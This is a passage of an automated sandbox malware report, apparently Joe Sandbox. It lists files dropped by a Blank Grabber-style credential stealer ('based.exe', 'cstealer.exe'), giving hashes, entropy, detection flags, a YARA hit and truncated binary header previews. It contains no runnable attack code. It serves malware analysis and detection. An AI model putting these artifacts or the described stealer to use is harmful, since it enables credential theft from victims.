                                                                                                                                                          SSDEEP:768:UA1cXZ83zNDKJ/KDQI5zbp61ypRcTID5IubYiSyvaPxWEw:UwnzKUQ+p6mcTID5Iub7SyiPx
                                                                                                                                                          MD5:596DF8ADA4B8BC4AE2C2E5BBB41A6C2E
                                                                                                                                                          SHA1:E814C2E2E874961A18D420C49D34B03C2B87D068
                                                                                                                                                          SHA-256:54348CFBF95FD818D74014C16343D9134282D2CF238329EEC2CDA1E2591565EC
                                                                                                                                                          SHA-512:E16AAD5230E4AF7437B19C3DB373B1A0A0A84576B608B34430CCED04FFC652C6FB5D8A1FE1D49AC623D8AE94C8735800C6B0A12C531DCDD012B05B5FD61DFF2E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.P..........@ .......................................@............`..........................................;..P....9.......0..........,............;......................................@,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):86400
                                                                                                                                                          Entropy (8bit):7.925569108441777
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:nomFQO4KV4FqKFztYJgYFlXeppHFEtnp8bacIUmDIDe1Ye7SyOePx:IO4KV0qKTYhFlupdQ8WLvIDe1Yehx
                                                                                                                                                          MD5:8D9E1BB65A192C8446155A723C23D4C5
                                                                                                                                                          SHA1:EA02B1BF175B7EF89BA092720B3DAA0C11BEF0F0
                                                                                                                                                          SHA-256:1549FE64B710818950AA9BF45D43FE278CE59F3B87B3497D2106FF793EFA6CF7
                                                                                                                                                          SHA-512:4D67306FE8334F772FE9D463CB4F874A8B56D1A4AD3825CFF53CAE4E22FA3E1ADBA982F4EA24785312B73D84A52D224DFB4577C1132613AA3AE050A990E4ABDF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_queue.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24960
                                                                                                                                                          Entropy (8bit):7.454617838702341
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cZ0Psz9rLZgNhzHjlnwX1hZa7gJXjDID7UuNBIYiSy1pCQYIPxh8E9VF0Nyb9:cnihFn43pzDID7Uu4YiSyv7PxWER
                                                                                                                                                          MD5:FBBBFBCDCF0A7C1611E27F4B3B71079E
                                                                                                                                                          SHA1:56888DF9701F9FAA86C03168ADCD269192887B7B
                                                                                                                                                          SHA-256:699C1F0F0387511EF543C0DF7EF81A13A1CFFDE4CE4CD43A1BAF47A893B99163
                                                                                                                                                          SHA-512:0A5BA701653CE9755048AE7B0395A15FBB35509BEF7C4B4FE7F11DC4934F3BD298BCDDBF2A05B61F75F8EB44C4C41B3616F07F9944E0620B031CBE87A7443284
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):42872
                                                                                                                                                          Entropy (8bit):7.71252337640455
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:eQ8MABQICeXD2rh0LklHwh20hpJ72IDQwzFDYiSyvGPxWERfsxi:eTieXEhow072IDQwzFD7Sy+Px3sxi
                                                                                                                                                          MD5:4351D7086E5221398B5B78906F4E84AC
                                                                                                                                                          SHA1:BA515A14EC1B076A6A3EAB900DF57F4F37BE104D
                                                                                                                                                          SHA-256:A0FA25EEF91825797F01754B7D7CF5106E355CF21322E926632F90AF01280ABE
                                                                                                                                                          SHA-512:A1BCF51E797CCAE58A0B4CFE83546E5E11F8FC011CA3568578C42E20BD7A367A5E1FA4237FB57AA84936EEC635337E457A61A2A4D6ECA3E90E6DDE18AE808025
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_sqlite3.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):56192
                                                                                                                                                          Entropy (8bit):7.831040417505209
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:2fDL703/MAe3F53jYTG3vy+1MNLjZVID5QjI7SyBPx:wD03/MHbH6+eL/ID5QjIXx
                                                                                                                                                          MD5:D678600C8AF1EEEAA5D8C1D668190608
                                                                                                                                                          SHA1:080404040AFC8B6E5206729DD2B9EE7CF2CB70BC
                                                                                                                                                          SHA-256:D6960F4426C09A12488EB457E62506C49A58D62A1CB16FBC3AE66B260453C2ED
                                                                                                                                                          SHA-512:8FD5F0FD5BD60C6531E1B4AD867F81DA92D5D54674028755E5680FB6005E6444805003D55B6CBAF4CDAD7B4B301CFFAB7B010229F6FD9D366405B8ADE1AF72D9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!.........`..P....p...................................0............`..........................................+..P....)....... .......................+..$...................................P...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\_ssl.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):62336
                                                                                                                                                          Entropy (8bit):7.846104968038435
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:U6ll/oOM5AGIyI1asq3YGDTgzOordBQkJIDt7o7/7Syi/Px:B/6AGLIcsq3YGn0ZQuIDt7ojEHx
                                                                                                                                                          MD5:156B1FA2F11C73ED25F63EE20E6E4B26
                                                                                                                                                          SHA1:36189A5CDE36D31664ACBD530575A793FC311384
                                                                                                                                                          SHA-256:A9B5F6C7A94FB6BFAF82024F906465FF39F9849E4A72A98A9B03FC07BF26DA51
                                                                                                                                                          SHA-512:A8181FFEB3CF8EF2A25357217A3DD05242CC0165473B024CF0AEB3F42E21E52C2550D227A1B83A6E5DAB33A185D78E86E495E9634E4F4C5C4A1AEC52C5457DCA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............0.....................................................`.........................................p...d....................P......................................................@...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\blank.aes

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):125377
                                                                                                                                                          Entropy (8bit):7.618849072392802
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QA93WqBg7cnznoE76zBZKqLMsdNxziiGpK8U6z:QAPBKcnt7QqIMsFzpGpK8U6z
                                                                                                                                                          MD5:3969CC49C67612098C05EA0F4E5B4D83
                                                                                                                                                          SHA1:5D393AFCA28764097DBC2152F20797E408B87580
                                                                                                                                                          SHA-256:77A58177A8EC983F12FEA4FF445EE7605C7B876C241A5A2F2A87B35F5902DC17
                                                                                                                                                          SHA-512:5C55EEBA6796B1BBDA2AF48A540215FA6A4CBCB841939CEB2C5C3552892EFE6DD54267EA8DBE0238A3FD265682FDD5A66F3699156C8CF39DA7CE5B3C7656BBE2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK........,..XX..K...K.......stub-o.pyc..........;fz8........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1189728
                                                                                                                                                          Entropy (8bit):7.945107908450931
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:jffQrZJIe6/4gho5HE1F03fkOyUU/BtSIgA0ft+rBFOWRIQ6sCY51CPwDv3uFfJv:Tf8JWwgho5HL3fknPSIKorCU1CPwDv3a
                                                                                                                                                          MD5:DAA2EED9DCEAFAEF826557FF8A754204
                                                                                                                                                          SHA1:27D668AF7015843104AA5C20EC6BBD30F673E901
                                                                                                                                                          SHA-256:4DAB915333D42F071FE466DF5578FD98F38F9E0EFA6D9355E9B4445FFA1CA914
                                                                                                                                                          SHA-512:7044715550B7098277A015219688C7E7A481A60E4D29F5F6558B10C7AC29195C6D5377DC234DA57D9DEF0C217BB3D7FECA332A64D632CA105503849F15E057EA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... .........@%.025..P%..................................P7...........`......................................... H5......C5.h....@5......`2.............H7......................................=5.@...........................................UPX0.....@%.............................UPX1.........P%.....................@....rsrc........@5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\libffi-8.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):25336
                                                                                                                                                          Entropy (8bit):7.563490694087984
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:uJvjb6KaBBu0wYkP2C0yZbMRpZa7gJXMrRCXPDG4y8c3UhH3:Wvj+3BcMp8KDG4yshH
                                                                                                                                                          MD5:90A6B0264A81BB8436419517C9C232FA
                                                                                                                                                          SHA1:17B1047158287EB6471416C5DF262B50D6FE1AED
                                                                                                                                                          SHA-256:5C4A0D4910987A38A3CD31EAE5F1C909029F7762D1A5FAF4A2E2A7E9B1ABAB79
                                                                                                                                                          SHA-512:1988DD58D291EE04EBFEC89836BB14FCAAFB9D1D71A93E57BD06FE592FEACE96CDDE6FCCE46FF8747339659A9A44CDD6CF6AC57FF495D0C15375221BF9B1666E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....@................................................................`.....................................................................8.......................................................8...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\libssl-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):208224
                                                                                                                                                          Entropy (8bit):7.9214932539909775
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5SI3oPlWLlPVVc5MpJa1pOjJnnioIZW8/Qf6bRXGKrs8qJjueW1LR/oSB6hetz:EIek5VC0FiHof6Z1rgJ63R/oS3
                                                                                                                                                          MD5:EAC369B3FDE5C6E8955BD0B8E31D0830
                                                                                                                                                          SHA1:4BF77158C18FE3A290E44ABD2AC1834675DE66B4
                                                                                                                                                          SHA-256:60771FB23EE37B4414D364E6477490324F142A907308A691F3DD88DC25E38D6C
                                                                                                                                                          SHA-512:C51F05D26FDA5E995FE6763877D4FCDB89CD92EF2D6EE997E49CC1EE7A77146669D26EC00AD76F940EF55ADAE82921DEDE42E55F51BD10D1283ECFE7C5009778
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .....P...`..@....p................................................`..........................................6..4@...3.......0...........M...........v......................................@%..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\python311.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1701240
                                                                                                                                                          Entropy (8bit):7.993696827956843
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:49152:A0/71KAZkPw/a5lsjIa7hhXBOQSbMS5ffODwKh/Wc:vziPwCvZalhXOMIzQd
                                                                                                                                                          MD5:BB46B85029B543B70276AD8E4C238799
                                                                                                                                                          SHA1:123BDCD9EEBCAC1EC0FD2764A37E5E5476BB0C1C
                                                                                                                                                          SHA-256:72C24E1DB1BA4DF791720A93CA9502D77C3738EEBF8B9092A5D82AA8D80121D0
                                                                                                                                                          SHA-512:5E993617509C1CF434938D6A467EB0494E04580AD242535A04937F7C174D429DA70A6E71792FC3DE69E103FFC5D9DE51D29001A4DF528CFFFEFDAA2CEF4EAF31
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!..........D...]...D...................................^...........`.........................................H.].......].......].......V../...........r^.....................................(.].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\rar.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):630736
                                                                                                                                                          Entropy (8bit):6.409476333013752
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                          MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                          SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                          SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                          SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):456
                                                                                                                                                          Entropy (8bit):4.447296373872587
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                          MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                          SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                          SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                          SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.key, Author: Joe Security
                                                                                                                                                          Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24960
                                                                                                                                                          Entropy (8bit):7.407412042104121
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oJUAW1guHrhWgWLBNZa7gJXZjNID7Gu6OIYiSy1pCQlIJNPxh8E9VF0NyUT2:eJjW1J2pJjNID7GuIYiSyvCPxWEC
                                                                                                                                                          MD5:ABF7864DB4445BBBD491C8CFF0410AE0
                                                                                                                                                          SHA1:4B0F3C5C7BF06C81A2C2C5693D37EF49F642A9B7
                                                                                                                                                          SHA-256:DDEADE367BC15EA09D42B2733D88F092DA5E880362EABE98D574BC91E03DE30E
                                                                                                                                                          SHA-512:8F55084EE137416E9D61FE7DE19E4CFF25A4B752494E9B1D6F14089448EF93E15CD820F9457C6CE9268781BD08E3DF41C5284801F03742BC5C40B3B81FB798C5
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\sqlite3.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):622976
                                                                                                                                                          Entropy (8bit):7.993556519822549
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:12288:C7dpDQ1L3zfmrtWF/azVC9oAnShBJl4cZ1pzgULOX110jt3:0HSzzaQl8VSSh2cZXgULq11y
                                                                                                                                                          MD5:DDD0DD698865A11B0C5077F6DD44A9D7
                                                                                                                                                          SHA1:46CD75111D2654910F776052CC30B5E1FCEB5AEE
                                                                                                                                                          SHA-256:A9DD0275131105DF5611F31A9E6FBF27FD77D0A35D1A73A9F4941235FBC68BD7
                                                                                                                                                          SHA-512:B2EE469EA5A6F49BBDD553363BAA8EBAD2BAF13A658D0D0C167FDE7B82EB77A417D519420DB64F325D0224F133E3C5267DF3AA56C11891D740D6742ADF84DBE4
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<T.S]:.S]:.S]:.Z%.._]:..&;.Q]:..&?.^]:..&>.[]:..&9.W]:../;.P]:.S];..]:..&2.R]:..&:.R]:..&.R]:..&8.R]:.RichS]:.........................PE..d.....Vc.........." ...!.0...0...............................................0............`.............................................L"......................\...........`-..........................................@...........................................UPX0....................................UPX1.....0.......&..................@....rsrc....0...........*..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI14722\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\Microsoft\based.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):300920
                                                                                                                                                          Entropy (8bit):7.985723274612961
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:Z2Fuue6iwoBLhgXM5kayIQJCEUcHQdBAFEzz9DxsXcY:Z2/e6inLOoyVJ/LHQdgipxsMY
                                                                                                                                                          MD5:BB3FCA6F17C9510B6FB42101FE802E3C
                                                                                                                                                          SHA1:CB576F3DBB95DC5420D740FD6D7109EF2DA8A99D
                                                                                                                                                          SHA-256:5E2F1BBFE3743A81B00717011094798929A764F64037BEDB7EA3D2ED6548EB87
                                                                                                                                                          SHA-512:05171C867A5D373D4F6420136B6AC29FA846A85B30085F9D7FABCBB4D902AFEE00716DD52010ED90E97C18E6CB4E915F13F31A15B2D8507E3A6CFA80E513B6A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...l...l...l..|....l.0.m...l.0.i...l.0.h...l.0.o...l.>.m...l.cvm...l...m...l.>.a...l.>.l...l.>.....l.>.n...l.Rich..l.................PE..d...k.Vc.........." ...!.`.......@.. ....P................................................`.............................................X....................P...................................................... ...@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83328
                                                                                                                                                          Entropy (8bit):6.532254531979707
                                                                                                                                                          Encrypted:false
